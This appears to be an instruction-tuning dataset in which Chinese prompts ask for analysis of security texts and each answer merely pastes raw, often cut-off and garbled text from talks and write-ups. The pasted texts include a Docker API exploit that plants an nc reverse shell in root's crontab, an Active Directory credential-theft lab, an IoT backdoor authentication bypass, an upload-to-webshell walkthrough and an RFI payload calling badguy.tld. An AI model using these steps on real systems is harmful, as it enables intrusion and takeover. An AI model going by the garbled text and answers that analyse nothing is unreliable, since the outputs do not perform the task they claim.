{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nElcomSoft.com ElcomSoft.com  2017 Vladimir Katalov ElcomSoft Co.Ltd. Moscow, Russia Breaking)into)the)iCloud)Keychain ElcomSoft.com Page 2 [Some)of])our)customers ElcomSoft.com Page 3 What)do)we)want)to)hack)today? 1.All)users)passwords 2.Credit)card)data ElcomSoft.com Page 4 Whats)inside)the)smartphone? (tip:&almost&everything)  Contacts)&)calendars  Call)logs)and)text)messages)  Emails)and)chats  Account'and'application'passwords  Web'and'Wi-Fi'passwords  Credit'card'data  Documents,)settings)and)databases  Web)history)&)searches  Pictures)and)videos  Geolocation)history,)routes)and)places  3rd party)app)data  Cached)internet)data  System)and)application)logs  Social)network)activities ElcomSoft.com  Problems  Different&platforms&(Apple,&Google,&Microsoft)  Many&vendor-specific&clouds  3rd party&cloud&services  Credentials&needed&(password&or&token)  Profits  No&physical&access&needed  May&be&performed&silently  Backup  No)standard)way)to)get  Might)not)be)available  Almost)all)data)from)device  Sync  Limited)set)of)data  Most)critical)real-time)data  Synced)across)all)devices  Storage  Only)files/documents  Easy)to)access Page 5 Data)acqusition methods)|)Cloud)acquisition)pros)and)cons  JTAG/chip-off  No)test)access)port)on)many)devices  Full)disk)encryption  Physical  Limited)compatibility  Data)may)be)encrypted  Logical  Limited)compatibility  Bypassing)screen)lock)is)needed  Cloud  Limited)set)of)data)// oh,$really?$J  Need)credentials  Legal)problems ElcomSoft.com  Full)device)backups)are)sometimes)available  3rd party)application)data)is)usually)not)available  Passwords)are)additionally)encrypted)with)hardware-specific key  Daily)backups)(in)best)case,)until)forced)from)the)device)  Backups)cannot)be)forced)remotely  3rd party)software)is)needed  Almost)no)way)to)manage  Slow)access,)long)download  Account)might)be)locked)due)to)suspicious)activity Page 6 Cloud)services:)backups)[iCloud] ElcomSoft.com Page 7 Cloud)services:)synced)data)[iCloud]  Contacts  Ca", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n域渗透从入门到自闭 前期准备 前言 本系列列在于从简单的Windows域环境搭建到利利用域的特性通过哈希传递攻击凭证窃取技术 结合互联网公布现成的安全研究工具进行行域横向移动渗透最终到达我们目标拿到ad域控 制器器权限 实验环境设置 下面列列出本次实验环境计算机跟练习中的一些配置设置均在VMWARE下完成 我们的域名将被命名为h4x0er.org公司因此创建域然后将这些PC电脑加入域lets go! 本次实验环境一共有三台电脑一台AD域控制器器DC另外两台员工PC 系统ISO下载地址: https://msdn.itellyou.cn/ Windows Server 2012(DC1) 1.修改计算机名 2.修改IP地址 3.服务器器管理理器器角色添加AD 一路路下一步到服务器器角色选择Active Directory域服务添加功能 继续一路路下一步到指定备用源选择自己Windows Server 2012 R2的安装光盘位置路路径这里里 我的光盘路路径是D:\\source\\sxs指定完后确定点击安装 4.安装AD域控制器器 回到我们服务器器管理理器器界面点击 添加新林林输入根域名:h4x0er.org 输入一个符合复杂度的密码点击下一步 域数据存放位置 一路路下一步安装 Windows7(Admins-PC/Victims-PC) 另外两台PC配置类似 1.设置计算机名 2.设置IP地址 3.加入域控 两台机器器加入完域后必须重启计算机 4.关闭防火墙 重启完电脑后把所有防火墙关闭 现在所有的电脑都加入了了域接下来我们添加一些账号跟组到域环境当中 域账号设置 在本次实验练习当中你将看到helpdesk帮助台和域管理理员之间进行行分离但其实并没有什什么 用不不足以防止凭证窃取让我们创建一个helpdesk组作为安全组进行行分离 组名 成员 描述 Helpdesk PonyM 用于管理理h4x0er.org域客户端 开始菜单->运行行>dsa.msc->容器器Users->右击新建->点击组->输入组名HelpDesk->确定 或直接在域控服务器器下以administrator权限输入命令 net group HelpDesk /add /domain 进行行创建安全组HelpDesk 让我们在域中创建三个用户 姓名 登录账号 描述 登录机器器 Jack Ma JackM 悔悔创阿里里Jack马是遭受钓鱼 邮件的受害者 VICTIMS-PC 依次按照以下步骤重复新建3个用户Jackma/Ponyma/RobinLi- Pony Ma PonyM 普通家庭Pony马是IT部门人 员同时也是Helpdesk安全 组的成员 VICTIMS-PC ADMINS-PC Robin Li RobinL 再赢一次Robin 李李是域管理理 员 ADMINS-PC AD域控制器器 以及添加Robin Li到域管理理员 或直接在域控服务器器下以administrator权限输入命令 net user JackM password123!@# /add /domain net user PonyM password456!@# /add /domain net user RobinL password789!@# /add /domain net group Domain Adminis RobinL /add /domain 最后创建了了三个账号以及一个安全组 对了了别忘记把Pony Ma加入HelpDesk安全组 右击Pony Ma属性->隶属于->添加->HelpDesk->确定 或直接在域控服务器器下以administrator权限输入命令 net group helpdesk PonyM /add /domain 我们的域管理理员Robin Li日常使用ADMINS-PC 其中HelpdeskPony Ma是其中一员可以管理理ADMINS-PC的计算机 搜索对应组 输入域账号密码确定 接着Jack Ma以及HelpDesk将被添加到他的个人终端电脑VICTIMS-PC管理理员权限 本次实验工具 1. 将在VICTIMS-PC电脑上安装以下工具文件存储于C:\\Tools  Mimikatz: https://github.com/gentilkiwi/mimikatz/releases  PowerSploit: https://github.com/PowerShellMafia/PowerSploit/releases  PsExec: https://docs.microsoft.com/en-us/sysinternals/downloads/psexec  NetSess.exe: http://www.joeware.net/fr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n从 后 门 到 漏 洞   智 能 设 备 私 有 协 议 中 的 安 全 问 题 魏凡 绿盟科技 格物实验室 安全研究员 0 1 概述 0 2 0 3 0 4 私有协议逆向分析的几个关键点 某私有协议漏洞挖掘之旅 总结与建议 目录 0 1 概述 0 2 0 3 0 4 私有协议逆向分析的几个关键点 某私有协议漏洞挖掘之旅 总结与建议 目录 智能设备中的私有协议 私有协议一般来说指未文档化的协议格式未知一般具有以下特点  从功能上来讲一般用于运维管理/服务发现等功能  一般监听于TCP/UDP的大端口  多数作为服务端部分可以在厂商官网找到协议的客户端 私有协议的格式未知所以逆向分析较难因此公开的漏洞较少但一出现安全问题一般 影响都较为严重 私有协议的安全问题 0 1 概述 0 2 0 3 0 4 私有协议逆向分析的几个关键点 某私有协议漏洞挖掘之旅 总结 目录 header 魔数 版本号 操作码 长度域 校验和  body 长度域 数据部分  可能存在header+body的嵌套 私有协议的一般格式 协议入口点网络通信函数 recv/sendrecvfrom/sendto, recvmsg/sendmsg 协议分析入口点 还有一些容易忽略的地方  有些采用ssl连接ssl_read/ssl_write  recv也可用于接收udp的数据包recvfrom也可用于接收tcp数据包  有时候通信函数在应用的调用库中 调试与调试权限获取 获取调试权限的一般思路  利用设备自带的TELNET/SSH功能  利用设备硬件调试接口  修改设备固件增加调试后门  利用设备的已知漏洞  利用设备的未知漏洞 准备静态编译的小工具比较常用的有 busybox, gdbserver和tcpdump 拿到设备的调试权限整个漏洞挖掘工作就成功了一半 来自某不知名研究员 0 1 概述 0 2 0 3 0 4 私有协议逆向分析的几个关键点 某私有协议漏洞挖掘之旅 总结与建议 目录 本议题所提到的漏洞均已送报厂商并已修复 一个偶然的机会我们拿到了一个某厂商生产的智能设备其某个TCP端口使用了一个私 有协议该协议未文档化官网也未提供任何管理客户端  CyaSSL_read  单向认证 某厂商智能设备私有协议分析  找到协议入口点  跟踪数据流向  逆向分析 常规漏洞挖掘思路 主观考虑智能设备的常见协议UPNP协议接口的命令注入 MQTT协议未授权访问 非常规的私有协议漏洞挖掘思路 协议脆弱点容易出现漏洞的地方 非常规思路以发现漏洞为导向暂时不考虑格式先了解其功能然后对其脆弱点进 行重点突破 协议提供的功能 reboot restorefactory 协议认证逻辑 取某个全局变量作为初始字符串将该字符串进过三次处理最后和用户传入的一个串进行比较 第一次处理和两个特殊字符 串进行移位混淆后续两次处理都 是标准md5运算 通过md5算法中的4个链接变量来识别 协议认证逻辑分析 假设作为初始字符串的全局变量为admin将利用如下算法进行处理 1取admin字符串和两个固定字符串一起参与移位混淆操作得到新字符串 2将第一次变换得到的新字符串进行标准md5运算得到hash值 \\x21\\x23\\x2f\\x29\\x7a\\x57\\xa5\\xa7\\x43\\x89\\x4a\\x0e\\x4a\\x80\\x1f\\xc3 3将第二次得到的hash值再次进行标准md5运算得到hash值 \\x43\\x44\\x26\\x76\\xc7\\x4a\\xe5\\x9f\\x21\\x9c\\x2d\\x87\\xfd\\x6b\\xad\\x52 将最后得到的hash值与用户传入进行比较若相等则认证成功 在调用认证函数之前有个函数将会给该全局变量赋值 是有趣的是这里将固定字符串admin拷贝到全局变量处 初始字符串的赋值 运维后门 传入固定字符串admin经过三次变换后的凭证 \\x43\\x44\\x26\\x76\\xc7\\x4a\\xe5\\x9f\\x21\\x9c\\x2d\\x87\\xfd\\x6b\\xad\\x52 即可完成认证过程控制设备重启/恢复出厂设置 用户我忘了设备的管理密码了怎么办 厂商IP告诉我一下我给你远程重置一下 用户666啊 协议的专利 功能  修改配置  重启  恢复出厂设置  固件更新 专利所有权厂商的第一类设备 从配置文件中读取web管理员密码作为原始字符串 初始字符串的获取 md5_digest(output, input, len) 运算长度len不能为0如果为0直接返回  传入md5_digest函数的长度参数为用户控制可设置为0  没有验证md5_digest函数的返回值直接将结果用于memcmp进行比较  参与memcmp的第一个参数被初始化为空  控制长度参数为0+凭据为空值16个\\x00的请求包即可", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWeb server botnets and hosting farms as attack platforms Gadi Evron  Beyond Security defcon 15 , 2007 About me Who I am.. What do I do.. Where do I work.. Regular malware Often Platform specific (Architecture, OS) Propagates by the use of: Vulnerabilities (web server, mail client, remote accessible service) Social engineering (user gullibility) Propagates randomly (++) Affects desktops (++) Web server malware Often Completely cross-platform (any web daemon supporting scripting languages) Propagates by the use of Google (and sometimes other search engines  \"Powered by phpBB\" ) Propagates from a pre-selected genetic pool (++) Affects servers (++) Which means Malware and Bots Web server malware is cross-platform and up to now infected an astounding number of web servers ready to be commanded in botnets. Attack platforms (lotsa web servers) Collocation facilities, ISP server farms, hosting providers, etc. Previous work PHP shells  generally explored File inclusion attacks (RFI)  Thoroughly explored R57shell analysed (SpamThru by Joe Stewart, SecureWorks  formerly LURHQ) Non other significant work done in this field up to a few months ago when this paper was written. New work Web server botnets and server farms as attack platforms (Kfir Damari, Noam Rathaus and myself. Virus Bulletin, February 1, 2007). Know your Enemy: Web Application Threats, Jamie Riden, Ryan McGeehan, Brian Engert, Michael Mueter. The Honeynet Project, February 7, 2007). The injection File inclusions are vulnerabilities in web applications which can allow an attacker to execute a script by including the file in an existing script, as an example by the use of the include() function in PHP. In some cases other types of vulnerabilities in web applications are also used, such as URL parsing code execution vulnerabilities, POST vulnerbailities and arbitrary file upload vulnerabilities. What an injection looks like The attack, in the form of an HTTP request: index.php?page=http://badguy.tld/ malware.cmd?cm", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n0x00前 某天测商业务时发现其中有个提供乐播放业务的资产正好有我想听的歌于是就有了这篇章 0x01信息收集 F12简单看下标信息环境: ServerSoft:IIS 7.5 CMS:JYMusic(ThinkPHP) 0x02开搞和碰壁 抱着试试看的态随便找了个资源件试了发解析漏洞没想到成功了那么现在只需要找到上传点就能getshell 了 常的编辑器 Ueditor/Umeditor Kindeditor ckeditor/ckfinder 程序上传点 头像/章/附件... 上传组件 标站开放注册登录后发现存在头像上传功能原以为直接可以搞定了结果却不尽意应该是次渲染 了 试了上传些次渲染后仍能执的Webshell后依然发现法正常getshell看样得放弃头像这个地了 0x03柳暗花明村 既然头像上传不通那么只能另寻出路分享乐功能被改成审核但是猜测接还是存在的 这通过fofa找到个功能正常的站点以下称为www.bbb.com 这个站点的分享乐功能是正常的 直接上传乐件 件正常上传但是没有返回路径emmm提交试试 wtf没有分类数据咋办祭出神器F12给select标签加个有value值的option 提示分享成功查看审核列表也有了编辑发现ID为23随便点进去个发现id为21 同时发现接可以获取乐上传路径替换为ID=23后取得路径 那么思路就来了把www.bbb.com的操作在www.aaa.com重现遍即可 直接把bbb.com上传乐件的请求移花接到aaa.com上burp改包host和cookie提交时改fileid 通过解析漏洞访问我们后缀名为MP3的webshell 此成功getshell", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 常见加密算法和编码识别 ## 前言 在对数据进行变换的过程中除了简单的字节操作之外还会使用一些常用的编码加密算法因此如果能够快速识别出对应的编码或者加密算法就能更快的分析出整个完整的算法CTF 逆向中通常出现的加密算法包括base64TEAAESRC4MD5等 ## Base64 Base64 是一种基于64个可打印字符来表示二进制数据的表示方法转换的时候将3字节的数据先后放入一个24位的缓冲区中先来的字节占高位数据不足3字节的话于缓冲器中剩下的比特用0补足每次取出6比特因为 按照其值选择`ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ `中的字符作为编码后的输出直到全部输入数据转换完成 通常而言 Base64 的识别特征为索引表当我们能找到 `ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ ` 这样索引表再经过简单的分析基本就能判定是 Base64 编码 当然有些题目 base64 的索引表是会变的一些变种的 base64 主要 就是修改了这个索引表 ## Tea 在[密码学](https://zh.wikipedia.org/wiki/%E5%AF%86%E7%A0%81%E5%AD%A6)中**微型加密算法**Tiny Encryption AlgorithmTEA是一种易于描述和[执行](https://zh.wikipedia.org/w/index.php?title=%E6%89%A7%E8%A1%8C&action=edit&redlink=1)的[块密码](https://zh.wikipedia.org/wiki/%E5%A1%8A%E5%AF%86%E7%A2%BC)通常只需要很少的代码就可实现其设计者是[剑桥大学计算机实验室](https://zh.wikipedia.org/wiki/%E5%89%91%E6%A1%A5%E5%A4%A7%E5%AD%A6)的[大卫惠勒](https://zh.wikipedia.org/w/index.php?title=%E5%A4%A7%E5%8D%AB%C2%B7%E6%83%A0%E5%8B%92&action=edit&redlink=1)与[罗杰尼达姆](https://zh.wikipedia.org/w/index.php?title=%E7%BD%97%E6%9D%B0%C2%B7%E5%B0%BC%E8%BE%BE%E5%A7%86&action=edit&redlink=1) 参考代码 ```c #include <stdint.h> void encrypt (uint32_t* v, uint32_t* k) { uint32_t v0=v[0], v1=v[1], sum=0, i; /* set up */ uint32_t delta=0x9e3779b9; /* a key schedule constant */ uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3]; /* cache key */ for (i=0; i < 32; i++) { /* basic cycle start */ sum += delta; v0 += ((v1<<4) + k0)  (v1 + sum)  ((v1>>5) + k1); v1 += ((v0<<4) + k2)  (v0 + sum)  ((v0>>5) + k3); } /* end cycle */ v[0]=v0; v[1]=v1; } void decrypt (uint32_t* v, uint32_t* k) { uint32_t v0=v[0], v1=v[1], sum=0xC6EF3720, i; /* set up */ uint32_t delta=0x9e3779b9; /* a key schedule constant */ uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3]; /* cache key */ for (i=0; i<32; i++) { /* basic cycle start */ v1 -= ((v0<<4) + k2)  (v0 + sum)  ((v0>>5) + k3); v0 -= ((v1<<4) + k0)  (v1 + sum)  ((v1>>5) + k1); sum -= delta; } /* end cycle */ v[0]=v0; v[1]=v1; } ``` 在 Tea", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#include <cstdio> #include <cstdint> uint64_t poly = 0xC96C5795D7870F42; uint64_t table[256]; void generate_table() { for(int i=0; i<256; ++i) { uint64_t crc = i; for(unsigned int j=0; j<8; ++j) { // is current coefficient set? if(crc & 1) { // yes, then assume it gets zero'd (by implied x64 coefficient of dividend) crc >>= 1; // and add rest of the divisor crc = poly; } else { // no? then move to next coefficient crc >>= 1; } } table[i] = crc; } } uint64_t calculate_crc(uint8_t* stream, unsigned int n, uint64_t crc) { for(unsigned int i=0; i<n; ++i) { uint8_t index = stream[i]  crc; uint64_t lookup = table[index]; crc >>= 8; crc = lookup; } return crc; } char buf1[100] = \": You probably just want the flag. So here it is: CTF{dZXi----------PIUTYMI}. :\"; char buf2[] = \": You probably just want the flag. So here it is: CTF{dZXi\\xff\\x9a\\xc3\\x25\\x99\\xee\\xb2\\x41--PIUTYMI}. :\"; uint64_t wantcrc = 0x30d498cbfb871112; int main() { generate_table(); // Set dashes, so that: // wantcrc == calculate_crc(buf1, 80, 0); printf(\"%lx\\n\", calculate_crc((uint8_t*)buf2, 80, 0)); }", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# docker daemon api 未授权访问漏洞 参考链接 - http://www.loner.fm/drops/#!/drops/1203.%E6%96%B0%E5%A7%BF%E5%8A%BF%E4%B9%8BDocker%20Remote%20API%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%92%8C%E5%88%A9%E7%94%A8 ## 漏洞环境 编译及启动漏洞环境 ``` docker compose build docker compose up -d ``` 环境启动后将监听2375端口 ## 漏洞复现 利用方法是我们随意启动一个容器并将宿主机的`/etc`目录挂载到容器中便可以任意读写文件了我们可以将命令写入crontab配置文件进行反弹shell ```python import docker client = docker.DockerClient(base_url='http://your-ip:2375/') data = client.containers.run('alpine:latest', r'''sh -c \"echo '* * * * * /usr/bin/nc your-ip 21 -e /bin/sh' >> /tmp/etc/crontabs/root\" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}}) ``` 写入crontab文件成功反弹shell ![](1.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWesley McGrew Assistant Research Professor Mississippi State University Department of Computer Science & Engineering Distributed Analytics and Security Institute Instrumenting Point-of-Sale Malware A Case Study in Communicating Malware Analysis More Effectively Introduction  The pragmatic and unapologetic offensive security guy  Breaking things  Reversing things  Mississippi State University - NSA CAE Cyber Ops  Enjoying my fourth year speaking at DEF CON The Plan  In general:  Adopt better practices in describing and demonstrating malware capabilities  Proposal to supplement written analyses with illustration that uses the malware itself  What well spend a good chunk of todays session doing:  Showing off some cool instrumented POS malware  Talk about how you can do the same Scientific Method (the really important bits)  Reproducibility  Reasons:  Verifying results  Starting new analysis where old analysis left off  Education of new reverse engineering specialists  IOC consumers vs. fellow analysts as an audience Whats often missing?  Sample info  Hashes  Availability  Procedure  Subverting malware- specific countermeasures  Context  Redacted info on compromised hosts and C2 hosts  Internal points of reference  Addresses of functionality/data being discussed Devils Advocate: Why its not there  Fellow analysts and students are not the target audience of many published analyses  Were left to pick through for technically useful info  Added effort - Its a lot of work to get your internal notes and tools fit for outside consumption  Analysis-consumer safety - preventing the reader for inadvertently infecting  Client confidentiality - Compelling. May be client-specific data in targeted malware  Competitive advantage - public relations, advertising services, showcase of technical ability  Perhaps not in our best interest to allow someone to further it, do it better, or worse: prove it wrong. Whats Being Done Elsewhere?  Reproducibility and verifiability are a big deal in any aca", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Bad Route * Category: Web * 200 Points * Solved by the JCTF Team ## Description > Our company belive that if we go on the bad route of environment pollution we have a direct effect on human health. > > However, some energy companies that are destroying the planet are tried to takedown our website. > > Your mission is to make sure that our new website is secure. ## Solution The attached website is a simple site with three pages: A home page, an \"about\" page and a login page. No obvious vulnerabilities related to the login page, so we dive into the sources: ```html <!doctype html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>The Parllel Ocean</title> <base href=\"/\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\"> <link rel=\"icon\" type=\"image/x-icon\" href=\"favicon.ico\"> <script>window.global = window;</script> <link rel=\"stylesheet\" href=\"styles.3ff695c00d717f2d2a11.css\"></head> <body> <app-root></app-root> <script src=\"runtime.acf0dec4155e77772545.js\" defer></script><script src=\"polyfills.35a5ca1855eb057f016a.js\" defer></script><script src=\"main.b8c73a19106d54f04466.js\" defer></script></body> </html> ``` This is a React application where most of the logic resides in the Javascript code. So, we dive deeper into the Javascript sources. Scanning through `main`, we encounter the following code: ```javascript class t { constructor() {} connect() { new WebSocket(\"wss://securityocean.corp.local/admin/log\") } } ``` This websocket looks interesting. We couldn't find a way to trigger this flow via the website, but we can trigger it manually too via the Javascript Developer Console: ```javascript var ws = new WebSocket(\"wss://securityocean.corp.local/admin/log\"); ws.onopen = function () { console.log('Connection opened'); }; ws.onmessage = function (evt) { console.log(\"Message received = \" + evt.data); }; ws.onclose = function () { console.log(\"Connection closed\"); }; ``` Output: ``` GET wss://securityocean.corp.local/admin/log Firefox cant establ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5. .\\\"******************************************************************* .\\\" .\\\" This file was generated with po4a. Translate the source file. .\\\" .\\\"******************************************************************* .TH TRUNCATE 1 2022年9月 \"GNU coreutils 9.1\" 用户命令 .SH 名称 truncate \\- 缩减或扩展文件尺寸至指定大小 .SH 概述 \\fBtruncate\\fP \\fI\\,选项\\/\\fP... \\fI\\,文件列表\\/\\fP... .SH 描述 .\\\" Add any additional description here .PP 将文件缩减或扩展至指定大小 .PP 如果指定文件不存在则创建 .PP 如果指定文件超出指定大小则超出的数据将丢失如果指定文件小于指定大小则将用零字节填充扩展部分空洞 .PP 必选参数对长短选项同时适用 .TP \\fB\\-c\\fP, \\fB\\-\\-no\\-create\\fP 不要创建任何文件 .TP \\fB\\-o\\fP, \\fB\\-\\-io\\-blocks\\fP 将给定大小的数字作为 IO 块数处理而非作为字节数处理 .TP \\fB\\-r\\fP, \\fB\\-\\-reference\\fP=\\fI\\,参考文件\\/\\fP 以所指定的文件大小作为基准 .TP \\fB\\-s\\fP, \\fB\\-\\-size\\fP=\\fI\\,尺寸值\\/\\fP 使用给定尺寸值设定或调整文件大小 .TP \\fB\\-\\-help\\fP 显示此帮助信息并退出 .TP \\fB\\-\\-version\\fP 显示版本信息并退出 .PP 所指定的尺寸值参数是一个整数后面可以跟一个单位例如10K 指 10*1024可用的单位有 KMGTPEZY1024 的幂以及 KBMB...1000 的幂也可以使用二进制前缀KiB=KMiB=M以此类推 .PP 给定尺寸值也可以使用下面给出的字符之一前缀进行修饰\\&'+' 指扩展数值'\\-' 指缩减数值'<' 值最大值'>' 指最小值 \\&'/' 修改大小为指定数值的倍数向下舍入'%' 修改大小为指定数值的倍数向上舍入 .SH 作者 由 Padraig Brady 编写 .SH 报告错误 GNU coreutils 的在线帮助 <https://www.gnu.org/software/coreutils/> .br 请向 <https://translationproject.org/team/zh_CN.html> 报告翻译错误 .SH 版权 Copyright \\(co 2022 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>. .br 本软件是自由软件您可以自由修改和重新发布它在法律允许的范围内不提供任何保证 .SH 参见 \\fBdd\\fP(1), \\fBtruncate\\fP(2), \\fBftruncate\\fP(2) .PP .br 完整文档请见 <https://www.gnu.org/software/coreutils/truncate> .br 或者在本地使用 info \\(aq(coreutils) truncate invocation\\(aq", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCautious! A New Exploitation Method! No Pipe but as Nasty as Dirty Pipe #BHUSA @BlackHatEvents Zhenpeng Lin, Yuhang Wu, Xinyu Xing Northwestern University #BHUSA @BlackHatEvents #DirtyCred Zhenpeng Lin @Markak_ Who Are We Zhenpeng Lin PhD Student zplin.me Xinyu Xing Associate Professor xinyuxing.org Yuhang Wu PhD Student yuhangw.blog #BHUSA @BlackHatEvents #DirtyCred Zhenpeng Lin @Markak_ Recap About Dirty Pipe  CVE-2022-0847  An uninitialized bug in Linux kernels pipe subsystem  Affected kernel v5.8 and higher  Data-only, no effective exploitation mitigation  Overwrite any files with read permission  Demonstrated LPE on Android #BHUSA @BlackHatEvents #DirtyCred Zhenpeng Lin @Markak_ What We Learned  Data-only is powerful  Universal exploit  Bypass CFI (enabled in Android kernel)  New mitigation required #BHUSA @BlackHatEvents #DirtyCred Zhenpeng Lin @Markak_ What We Learned  Data-only is powerful  Universal exploit  Bypass CFI (enabled in Android kernel)  New mitigation required  Dirty Pipe is not perfect  Cannot actively escape from container  Not a generic exploitation method #BHUSA @BlackHatEvents #DirtyCred Zhenpeng Lin @Markak_ Introducing DirtyCred  High-level idea  Swapping Linux kernel Credentials  Advantages  A generic exploitation method, simple and effective  Write a data-only, universal (i.e., Dirty-Pipe-liked) exploit  Actively escape from container #BHUSA @BlackHatEvents #DirtyCred Zhenpeng Lin @Markak_ Comparison with Dirty Pipe  A generic exploitation method?  Write a data-only, universal exploit?  Attack with CFI enabled (on Android)?  Actively escape from container?  Threat still exists? Dirty Pipe DirtyCred #BHUSA @BlackHatEvents #DirtyCred Zhenpeng Lin @Markak_ Kernel Credential  Properties that carry privilege information in kernel  Defined in kernel documentation  Representation of privilege and capability  Two main types: task credentials and open file credentials  Security checks act on credential objects Source: https://www.kernel.org/doc/D", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Death Envelope: A Medieval Solution to a 21st Century Problem Matt Yoder August 8-10, 2008, Las Vegas, Nevada Who am I?  Matt Yoder, acronym@acrønym.com  Mostly a guy who believes in the concept, and wants to spread the word.  Made a promise to a friend, that if I couldnt find a good resource, Id make it.  Ive given the topic a lot of thought.  Undeniably a lover of fine pens and paper, and a pencrafter. The Death Envelope: A Medieval Solution to a 21st Century Problem Defcon 16, August 8-10, 2008 Matt Yoder Todays Goals 1. What is a death envelope, and what problem does it solve? 2. Who should have one, or ask for one? 3. What should be in a death envelope? 4. Security options for a death envelope. 5. Varied forms of solutions. The Death Envelope: A Medieval Solution to a 21st Century Problem Defcon 16, August 8-10, 2008 Matt Yoder What is a Death Envelope?  In todays high-tech society, far too much important information is stored purely in individuals brains.  A record of this information should exist, in case of ones incapacitation or extinction.  This record must be highly-secured, and tamper-resistant, and evident. The Death Envelope: A Medieval Solution to a 21st Century Problem Defcon 16, August 8-10, 2008 Matt Yoder How Big a Problem is it?  High-tech users have lots of passwords.  First poll I found shows an average of 40 passwords, 15 of which can be considered sensitive. Source: http://www.securitymetrics.org/content/Wiki.jsp?page=Welcome_blogentry_050208_1 Source: http://management.silicon.com/government/0,39024677,39126737,00.htm The Death Envelope: A Medieval Solution to a 21st Century Problem Defcon 16, August 8-10, 2008 Matt Yoder Who Should Have a Death Envelope?  In short, anyone with information they wish to be available after their death.  An argument could be made that anyone with a computer will have some reason for a Death Envelope  Specifically:  Those with high-risk jobs or activities. Police, Fire, Military. Skydivers, extreme sport ent", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSearching for Malware: A Review of Attackers Use of Search Engines to Lure Victims Paul Judge David Maynor The Problem Sites like Twitter, Yahoo!, Bing and Google all have some form of popular/trending search terms. These terms can be coopted by markets and malware authors to point to their own wares. The sites can be used for spam, driveby malware installs and phishing. DEMO: Examples of current terms and sites that have fallen prey to SEO poisoning. How They Do It A brief overview and example of previous term hijacking techniques. Current ways to find the terms. Flooding Web sites and social networks with specific terms and links. AndWe have malware! DEMO: A successful SEO poison. How Its Detected Lists, Lists and more lists White Lists Black Lists SPAM Lists Vendor Proprietary Databases These dont always wor Average time between infection and a URL showing up on a list could be days at best, weeks at worst. DEMO: List lag Code analysis (All these sites have something in common; they are trying to hide their true intention.) Code analysis of the Webpage including any JavaScript found can reliable detect a suspicious site DEMO: JavaScript analysis of a bad site Correlation How to tie this all together Gaps in coverage: How can the bad guys still slip through? Future of Search Engine Malware Attacker Countermeasures Better Obfuscation Using botnets and social networks to create an instant credible account More targeted attacks: spear phishing for SEO poisoning How Search Engines should respond  interactive discussion THANK YOU! http://www.barracudalabs.com/", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDefcon Comedy Jam 2 The FAIL Strikes Back We are: David Mortman aka Arthur Rich Mogull aka Crash Chris Hoff aka FAIL Robert \"RSnake\" Hansen aka RSnake Larry Pesce aka HaxorTheMatrix David Maynor aka Goat? What Goat?", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ngzexe === 用来压缩可执行文件 ## 补充说明 **gzexe命令** 用来压缩可执行文件压缩后的文件仍然为可执行文件在执行时进行自动解压缩当您去执行被压缩过的执行文件时该文件会自动解压然后继续执行和使用一般的执行文件相同这个命令也可以看成是gunzip命令的一个扩展 ### 语法 ```shell gzexe(选项)(参数) ``` ### 选项 ```shell -d解压缩被gzexe压缩过的可执行文件 ``` ### 参数 文件指定需要压缩的可执行文件", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFuzzing AOSP for non-crash bugs Elphet & Guang Gong @360 Alpha Team About us Elphet Security Researcher (Intern) of 360 Alpha Team Focus on Android system and application security Guang Gong Senior Security Researcher and Team Leader of 360 Alpha Team Focus on Android/Chrome Introduction  Fuzzers catch memory corruption bugs via crashes. When a bug doesnt result in a crash, then it will be ignored.  Memory debugging tool also known as a runtime debugger is a tool for finding software memory problem during runtime. They increase the crash rate of a program by reporting errors positively. (e.g. ASAN, MSAN, TSAN)  Some kinds of bugs cannot be uncovered even with the help of sanitizers.  e.g. Intra-object-overflow  We built a tool based on LLVM to help our fuzzers find ~30 vulnerabilities in AOSP Agenda Fuzzers and Sanitizers Intra-object-overflow Bugs 